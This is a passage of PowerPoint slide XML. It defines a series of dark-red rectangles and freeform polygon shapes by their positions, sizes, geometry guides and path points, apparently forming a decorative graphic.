              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="2781" y="3080"/>
              <a:ext cx="21"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493" name="Rectangle 542"/>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="2712" y="3080"/>
              <a:ext cx="22"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494" name="Rectangle 543"/>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="2715" y="3041"/>
              <a:ext cx="43" cy="34"/>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495" name="Rectangle 544"/>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="2760" y="3042"/>
              <a:ext cx="43"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496" name="Rectangle 545"/>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="2715" y="3193"/>
              <a:ext cx="40"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497" name="Rectangle 546"/>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="2759" y="3193"/>
              <a:ext cx="42"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498" name="Rectangle 547"/>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="2780" y="3155"/>
              <a:ext cx="22"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499" name="Rectangle 548"/>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="2716" y="3155"/>
              <a:ext cx="17"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00" name="Rectangle 549"/>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="2715" y="3266"/>
              <a:ext cx="40"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01" name="Rectangle 550"/>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="2759" y="3266"/>
              <a:ext cx="42"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02" name="Rectangle 551"/>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="2737" y="3229"/>
              <a:ext cx="42"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03" name="Rectangle 552"/>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="2780" y="3229"/>
              <a:ext cx="22" cy="32"/>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504" name="Rectangle 553"/>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="2715" y="3229"/>
              <a:ext cx="18"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05" name="Rectangle 554"/>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="2715" y="3342"/>
              <a:ext cx="40"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06" name="Rectangle 555"/>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="2759" y="3342"/>
              <a:ext cx="42"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07" name="Rectangle 556"/>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="2736" y="3304"/>
              <a:ext cx="43" cy="33"/>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508" name="Rectangle 557"/>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="2780" y="3304"/>
              <a:ext cx="21"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09" name="Rectangle 558"/>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="2716" y="3304"/>
              <a:ext cx="17"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10" name="Rectangle 559"/>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="2715" y="3417"/>
              <a:ext cx="42"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11" name="Rectangle 560"/>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="2759" y="3416"/>
              <a:ext cx="43" cy="34"/>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12" name="Rectangle 561"/>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="2737" y="3379"/>
              <a:ext cx="43"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13" name="Rectangle 562"/>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="2781" y="3379"/>
              <a:ext cx="21"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14" name="Rectangle 563"/>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="2715" y="3492"/>
              <a:ext cx="40" cy="33"/>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515" name="Rectangle 564"/>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="2759" y="3492"/>
              <a:ext cx="42"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16" name="Rectangle 565"/>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="2737" y="3455"/>
              <a:ext cx="42" cy="31"/>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517" name="Rectangle 566"/>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="2780" y="3453"/>
              <a:ext cx="22"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18" name="Rectangle 567"/>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="2716" y="3453"/>
              <a:ext cx="17"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19" name="Rectangle 568"/>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="2715" y="3566"/>
              <a:ext cx="40"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20" name="Rectangle 569"/>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="2759" y="3566"/>
              <a:ext cx="42" cy="32"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:solidFill>
              <a:srgbClr val="400000"/>
            </a:solidFill>
            <a:ln w="9525">
              <a:noFill/>
              <a:miter lim="800000"/>
              <a:headEnd/>
              <a:tailEnd/>
            </a:ln>
          </p:spPr>
          <p:txBody>
            <a:bodyPr/>
            <a:lstStyle/>
            <a:p>
              <a:endParaRPr lang="en-US" altLang="en-US">
                <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="10521" name="Rectangle 570"/>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="2737" y="3528"/>
              <a:ext cx="42" cy="32"/>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522" name="Rectangle 571"/>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="2780" y="3528"/>
              <a:ext cx="22"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23" name="Rectangle 572"/>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="2715" y="3528"/>
              <a:ext cx="18"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24" name="Freeform 573"/>
            <p:cNvSpPr>
              <a:spLocks/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="2704" y="3555"/>
              <a:ext cx="12" cy="41"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="T0" fmla="*/ 12 w 12"/>
                <a:gd name="T1" fmla="*/ 11 h 41"/>
                <a:gd name="T2" fmla="*/ 12 w 12"/>
                <a:gd name="T3" fmla="*/ 41 h 41"/>
                <a:gd name="T4" fmla="*/ 0 w 12"/>
                <a:gd name="T5" fmla="*/ 29 h 41"/>
                <a:gd name="T6" fmla="*/ 0 w 12"/>
                <a:gd name="T7" fmla="*/ 0 h 41"/>
                <a:gd name="T8" fmla="*/ 12 w 12"/>
                <a:gd name="T9" fmla="*/ 11 h 41"/>
                <a:gd name="T10" fmla="*/ 0 60000 65536"/>
                <a:gd name="T11" fmla="*/ 0 60000 65536"/>
                <a:gd name="T12" fmla="*/ 0 60000 65536"/>
                <a:gd name="T13" fmla="*/ 0 60000 65536"/>
                <a:gd name="T14" fmla="*/ 0 60000 65536"/>
                <a:gd name="T15" fmla="*/ 0 w 12"/>
                <a:gd name="T16" fmla="*/ 0 h 41"/>
                <a:gd name="T17" fmla="*/ 12 w 12"/>
                <a:gd name="T18" fmla="*/ 41 h 41"/>
              </a:gdLst>
              <a:ahLst/>
              <a:cxnLst>
                <a:cxn ang="T10">
                  <a:pos x="T0" y="T1"/>
                </a:cxn>
                <a:cxn ang="T11">
                  <a:pos x="T2" y="T3"/>
                </a:cxn>
                <a:cxn ang="T12">
                  <a:pos x="T4" y="T5"/>
                </a:cxn>
                <a:cxn ang="T13">
                  <a:pos x="T6" y="T7"/>
                </a:cxn>
                <a:cxn ang="T14">
                  <a:pos x="T8" y="T9"/>
                </a:cxn>
              </a:cxnLst>
              <a:rect l="T15" t="T16" r="T17" b="T18"/>
              <a:pathLst>
                <a:path w="12" h="41">
                  <a:moveTo>
                    <a:pt x="12" y="11"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="12" y="41"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="29"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="12" y="11"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
              </a:pathLst>
            </a:custGeom>
            <a:solidFill>
              <a:srgbClr val="800000"/>
            </a:solidFill>
            <a:ln w="9525">
              <a:noFill/>
              <a:round/>
              <a:headEnd/>
              <a:tailEnd/>
            </a:ln>
          </p:spPr>
          <p:txBody>
            <a:bodyPr/>
            <a:lstStyle/>
            <a:p>
              <a:endParaRPr lang="en-US"/>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="10525" name="Freeform 574"/>
            <p:cNvSpPr>
              <a:spLocks/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="2667" y="3513"/>
              <a:ext cx="35" cy="70"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="T0" fmla="*/ 35 w 35"/>
                <a:gd name="T1" fmla="*/ 40 h 70"/>
                <a:gd name="T2" fmla="*/ 35 w 35"/>
                <a:gd name="T3" fmla="*/ 70 h 70"/>
                <a:gd name="T4" fmla="*/ 0 w 35"/>
                <a:gd name="T5" fmla="*/ 30 h 70"/>
                <a:gd name="T6" fmla="*/ 0 w 35"/>
                <a:gd name="T7" fmla="*/ 0 h 70"/>
                <a:gd name="T8" fmla="*/ 35 w 35"/>
                <a:gd name="T9" fmla="*/ 40 h 70"/>
                <a:gd name="T10" fmla="*/ 0 60000 65536"/>
                <a:gd name="T11" fmla="*/ 0 60000 65536"/>
                <a:gd name="T12" fmla="*/ 0 60000 65536"/>
                <a:gd name="T13" fmla="*/ 0 60000 65536"/>
                <a:gd name="T14" fmla="*/ 0 60000 65536"/>
                <a:gd name="T15" fmla="*/ 0 w 35"/>
                <a:gd name="T16" fmla="*/ 0 h 70"/>
                <a:gd name="T17" fmla="*/ 35 w 35"/>
                <a:gd name="T18" fmla="*/ 70 h 70"/>
              </a:gdLst>
              <a:ahLst/>
              <a:cxnLst>
                <a:cxn ang="T10">
                  <a:pos x="T0" y="T1"/>
                </a:cxn>
                <a:cxn ang="T11">
                  <a:pos x="T2" y="T3"/>
                </a:cxn>
                <a:cxn ang="T12">
                  <a:pos x="T4" y="T5"/>
                </a:cxn>
                <a:cxn ang="T13">
                  <a:pos x="T6" y="T7"/>
                </a:cxn>
                <a:cxn ang="T14">
                  <a:pos x="T8" y="T9"/>
                </a:cxn>
              </a:cxnLst>
              <a:rect l="T15" t="T16" r="T17" b="T18"/>
              <a:pathLst>
                <a:path w="35" h="70">
                  <a:moveTo>
                    <a:pt x="35" y="40"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="35" y="70"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="30"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="35" y="40"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
              </a:pathLst>
            </a:custGeom>
            <a:solidFill>
              <a:srgbClr val="400000"/>
            </a:solidFill>
            <a:ln w="9525">
              <a:noFill/>
              <a:round/>
              <a:headEnd/>
              <a:tailEnd/>
            </a:ln>
          </p:spPr>
          <p:txBody>
            <a:bodyPr/>
            <a:lstStyle/>
            <a:p>
              <a:endParaRPr lang="en-US"/>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="10526" name="Freeform 575"/>
            <p:cNvSpPr>
              <a:spLocks/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="2631" y="3474"/>
              <a:ext cx="35" cy="67"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="T0" fmla="*/ 35 w 35"/>
                <a:gd name="T1" fmla="*/ 39 h 67"/>
                <a:gd name="T2" fmla="*/ 35 w 35"/>
                <a:gd name="T3" fmla="*/ 67 h 67"/>
                <a:gd name="T4" fmla="*/ 0 w 35"/>
                <a:gd name="T5" fmla="*/ 28 h 67"/>
                <a:gd name="T6" fmla="*/ 0 w 35"/>
                <a:gd name="T7" fmla="*/ 0 h 67"/>
                <a:gd name="T8" fmla="*/ 35 w 35"/>
                <a:gd name="T9" fmla="*/ 39 h 67"/>
                <a:gd name="T10" fmla="*/ 0 60000 65536"/>
                <a:gd name="T11" fmla="*/ 0 60000 65536"/>
                <a:gd name="T12" fmla="*/ 0 60000 65536"/>
                <a:gd name="T13" fmla="*/ 0 60000 65536"/>
                <a:gd name="T14" fmla="*/ 0 60000 65536"/>
                <a:gd name="T15" fmla="*/ 0 w 35"/>
                <a:gd name="T16" fmla="*/ 0 h 67"/>
                <a:gd name="T17" fmla="*/ 35 w 35"/>
                <a:gd name="T18" fmla="*/ 67 h 67"/>
              </a:gdLst>
              <a:ahLst/>
              <a:cxnLst>
                <a:cxn ang="T10">
                  <a:pos x="T0" y="T1"/>
                </a:cxn>
                <a:cxn ang="T11">
                  <a:pos x="T2" y="T3"/>
                </a:cxn>
                <a:cxn ang="T12">
                  <a:pos x="T4" y="T5"/>
                </a:cxn>
                <a:cxn ang="T13">
                  <a:pos x="T6" y="T7"/>
                </a:cxn>
                <a:cxn ang="T14">
                  <a:pos x="T8" y="T9"/>
                </a:cxn>
              </a:cxnLst>
              <a:rect l="T15" t="T16" r="T17" b="T18"/>
              <a:pathLst>
                <a:path w="35" h="67">
                  <a:moveTo>
                    <a:pt x="35" y="39"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="35" y="67"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="28"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="35" y="39"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
              </a:pathLst>
            </a:custGeom>
            <a:solidFill>
              <a:srgbClr val="800000"/>
            </a:solidFill>
            <a:ln w="9525">
              <a:noFill/>
              <a:round/>
              <a:headEnd/>
              <a:tailEnd/>
            </a:ln>
          </p:spPr>
          <p:txBody>
            <a:bodyPr/>
            <a:lstStyle/>
            <a:p>
              <a:endParaRPr lang="en-US"/>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="10527" name="Freeform 576"/>
            <p:cNvSpPr>
              <a:spLocks/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="2594" y="3435"/>
              <a:ext cx="34" cy="65"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="T0" fmla="*/ 34 w 34"/>
                <a:gd name="T1" fmla="*/ 37 h 65"/>
                <a:gd name="T2" fmla="*/ 34 w 34"/>
                <a:gd name="T3" fmla="*/ 65 h 65"/>
                <a:gd name="T4" fmla="*/ 0 w 34"/>
                <a:gd name="T5" fmla="*/ 28 h 65"/>
                <a:gd name="T6" fmla="*/ 0 w 34"/>
                <a:gd name="T7" fmla="*/ 0 h 65"/>
                <a:gd name="T8" fmla="*/ 34 w 34"/>
                <a:gd name="T9" fmla="*/ 37 h 65"/>
                <a:gd name="T10" fmla="*/ 0 60000 65536"/>
                <a:gd name="T11" fmla="*/ 0 60000 65536"/>
                <a:gd name="T12" fmla="*/ 0 60000 65536"/>
                <a:gd name="T13" fmla="*/ 0 60000 65536"/>
                <a:gd name="T14" fmla="*/ 0 60000 65536"/>
                <a:gd name="T15" fmla="*/ 0 w 34"/>
                <a:gd name="T16" fmla="*/ 0 h 65"/>
                <a:gd name="T17" fmla="*/ 34 w 34"/>
                <a:gd name="T18" fmla="*/ 65 h 65"/>
              </a:gdLst>
              <a:ahLst/>
              <a:cxnLst>
                <a:cxn ang="T10">
                  <a:pos x="T0" y="T1"/>
                </a:cxn>
                <a:cxn ang="T11">
                  <a:pos x="T2" y="T3"/>
                </a:cxn>
                <a:cxn ang="T12">
                  <a:pos x="T4" y="T5"/>
                </a:cxn>
                <a:cxn ang="T13">
                  <a:pos x="T6" y="T7"/>
                </a:cxn>
                <a:cxn ang="T14">
                  <a:pos x="T8" y="T9"/>
                </a:cxn>
              </a:cxnLst>
              <a:rect l="T15" t="T16" r="T17" b="T18"/>
              <a:pathLst>
                <a:path w="34" h="65">
                  <a:moveTo>
                    <a:pt x="34" y="37"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="34" y="65"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="28"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="34" y="37"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
              </a:pathLst>
            </a:custGeom>
            <a:solidFill>
              <a:srgbClr val="600000"/>
            </a:solidFill>
            <a:ln w="9525">
              <a:noFill/>
              <a:round/>
              <a:headEnd/>
              <a:tailEnd/>
            </a:ln>
          </p:spPr>
          <p:txBody>
            <a:bodyPr/>
            <a:lstStyle/>
            <a:p>
              <a:endParaRPr lang="en-US"/>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="10528" name="Freeform 577"/>
            <p:cNvSpPr>
              <a:spLocks/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="2575" y="3414"/>
              <a:ext cx="17" cy="46"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="T0" fmla="*/ 17 w 17"/>
                <a:gd name="T1" fmla="*/ 18 h 46"/>
                <a:gd name="T2" fmla="*/ 17 w 17"/>
                <a:gd name="T3" fmla="*/ 46 h 46"/>
                <a:gd name="T4" fmla="*/ 0 w 17"/>
                <a:gd name="T5" fmla="*/ 27 h 46"/>
                <a:gd name="T6" fmla="*/ 0 w 17"/>
                <a:gd name="T7" fmla="*/ 0 h 46"/>
                <a:gd name="T8" fmla="*/ 17 w 17"/>
                <a:gd name="T9" fmla="*/ 18 h 46"/>
                <a:gd name="T10" fmla="*/ 0 60000 65536"/>
                <a:gd name="T11" fmla="*/ 0 60000 65536"/>
                <a:gd name="T12" fmla="*/ 0 60000 65536"/>
                <a:gd name="T13" fmla="*/ 0 60000 65536"/>
                <a:gd name="T14" fmla="*/ 0 60000 65536"/>
                <a:gd name="T15" fmla="*/ 0 w 17"/>
                <a:gd name="T16" fmla="*/ 0 h 46"/>
                <a:gd name="T17" fmla="*/ 17 w 17"/>
                <a:gd name="T18" fmla="*/ 46 h 46"/>
              </a:gdLst>
              <a:ahLst/>
              <a:cxnLst>
                <a:cxn ang="T10">
                  <a:pos x="T0" y="T1"/>
                </a:cxn>
                <a:cxn ang="T11">
                  <a:pos x="T2" y="T3"/>
                </a:cxn>
                <a:cxn ang="T12">
                  <a:pos x="T4" y="T5"/>
                </a:cxn>
                <a:cxn ang="T13">
                  <a:pos x="T6" y="T7"/>
                </a:cxn>
                <a:cxn ang="T14">
                  <a:pos x="T8" y="T9"/>
                </a:cxn>
              </a:cxnLst>
              <a:rect l="T15" t="T16" r="T17" b="T18"/>
              <a:pathLst>
                <a:path w="17" h="46">
                  <a:moveTo>
                    <a:pt x="17" y="18"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="17" y="46"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="27"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="17" y="18"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
              </a:pathLst>
            </a:custGeom>
            <a:solidFill>
              <a:srgbClr val="800000"/>
            </a:solidFill>
            <a:ln w="9525">
              <a:noFill/>
              <a:round/>
              <a:headEnd/>
              <a:tailEnd/>
            </a:ln>
          </p:spPr>
          <p:txBody>
            <a:bodyPr/>
            <a:lstStyle/>
            <a:p>
              <a:endParaRPr lang="en-US"/>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="10529" name="Freeform 578"/>
            <p:cNvSpPr>
              <a:spLocks/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="2704" y="3036"/>
              <a:ext cx="12" cy="36"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="T0" fmla="*/ 12 w 12"/>
                <a:gd name="T1" fmla="*/ 5 h 36"/>
                <a:gd name="T2" fmla="*/ 12 w 12"/>
                <a:gd name="T3" fmla="*/ 36 h 36"/>
                <a:gd name="T4" fmla="*/ 0 w 12"/>
                <a:gd name="T5" fmla="*/ 31 h 36"/>
                <a:gd name="T6" fmla="*/ 0 w 12"/>
                <a:gd name="T7" fmla="*/ 0 h 36"/>
                <a:gd name="T8" fmla="*/ 12 w 12"/>
                <a:gd name="T9" fmla="*/ 5 h 36"/>
                <a:gd name="T10" fmla="*/ 0 60000 65536"/>
                <a:gd name="T11" fmla="*/ 0 60000 65536"/>
                <a:gd name="T12" fmla="*/ 0 60000 65536"/>
                <a:gd name="T13" fmla="*/ 0 60000 65536"/>
                <a:gd name="T14" fmla="*/ 0 60000 65536"/>
                <a:gd name="T15" fmla="*/ 0 w 12"/>
                <a:gd name="T16" fmla="*/ 0 h 36"/>
                <a:gd name="T17" fmla="*/ 12 w 12"/>
                <a:gd name="T18" fmla="*/ 36 h 36"/>
              </a:gdLst>
              <a:ahLst/>
              <a:cxnLst>
                <a:cxn ang="T10">
                  <a:pos x="T0" y="T1"/>
                </a:cxn>
                <a:cxn ang="T11">
                  <a:pos x="T2" y="T3"/>
                </a:cxn>
                <a:cxn ang="T12">
                  <a:pos x="T4" y="T5"/>
                </a:cxn>
                <a:cxn ang="T13">
                  <a:pos x="T6" y="T7"/>
                </a:cxn>
                <a:cxn ang="T14">
                  <a:pos x="T8" y="T9"/>
                </a:cxn>
              </a:cxnLst>
              <a:rect l="T15" t="T16" r="T17" b="T18"/>
              <a:pathLst>
                <a:path w="12" h="36">
                  <a:moveTo>
                    <a:pt x="12" y="5"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="12" y="36"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="31"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="12" y="5"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
              </a:pathLst>
            </a:custGeom>
            <a:solidFill>
              <a:srgbClr val="800000"/>
            </a:solidFill>
            <a:ln w="9525">
              <a:noFill/>
              <a:round/>
              <a:headEnd/>
              <a:tailEnd/>
            </a:ln>
          </p:spPr>
          <p:txBody>
            <a:bodyPr/>
            <a:lstStyle/>
            <a:p>
              <a:endParaRPr lang="en-US"/>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="10530" name="Freeform 579"/>
            <p:cNvSpPr>
              <a:spLocks/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="2667" y="3016"/>
              <a:ext cx="35" cy="49"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="T0" fmla="*/ 35 w 35"/>
                <a:gd name="T1" fmla="*/ 19 h 49"/>
                <a:gd name="T2" fmla="*/ 35 w 35"/>
                <a:gd name="T3" fmla="*/ 49 h 49"/>
                <a:gd name="T4" fmla="*/ 0 w 35"/>
                <a:gd name="T5" fmla="*/ 30 h 49"/>
                <a:gd name="T6" fmla="*/ 0 w 35"/>
                <a:gd name="T7" fmla="*/ 0 h 49"/>
                <a:gd name="T8" fmla="*/ 35 w 35"/>
                <a:gd name="T9" fmla="*/ 19 h 49"/>
                <a:gd name="T10" fmla="*/ 0 60000 65536"/>
                <a:gd name="T11" fmla="*/ 0 60000 65536"/>
                <a:gd name="T12" fmla="*/ 0 60000 65536"/>
                <a:gd name="T13" fmla="*/ 0 60000 65536"/>
                <a:gd name="T14" fmla="*/ 0 60000 65536"/>
                <a:gd name="T15" fmla="*/ 0 w 35"/>
                <a:gd name="T16" fmla="*/ 0 h 49"/>
                <a:gd name="T17" fmla="*/ 35 w 35"/>
                <a:gd name="T18" fmla="*/ 49 h 49"/>
              </a:gdLst>
              <a:ahLst/>
              <a:cxnLst>
                <a:cxn ang="T10">
                  <a:pos x="T0" y="T1"/>
                </a:cxn>
                <a:cxn ang="T11">
                  <a:pos x="T2" y="T3"/>
                </a:cxn>
                <a:cxn ang="T12">
                  <a:pos x="T4" y="T5"/>
                </a:cxn>
                <a:cxn ang="T13">
                  <a:pos x="T6" y="T7"/>
                </a:cxn>
                <a:cxn ang="T14">
                  <a:pos x="T8" y="T9"/>
                </a:cxn>
              </a:cxnLst>
              <a:rect l="T15" t="T16" r="T17" b="T18"/>
              <a:pathLst>
                <a:path w="35" h="49">
                  <a:moveTo>
                    <a:pt x="35" y="19"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="35" y="49"/>
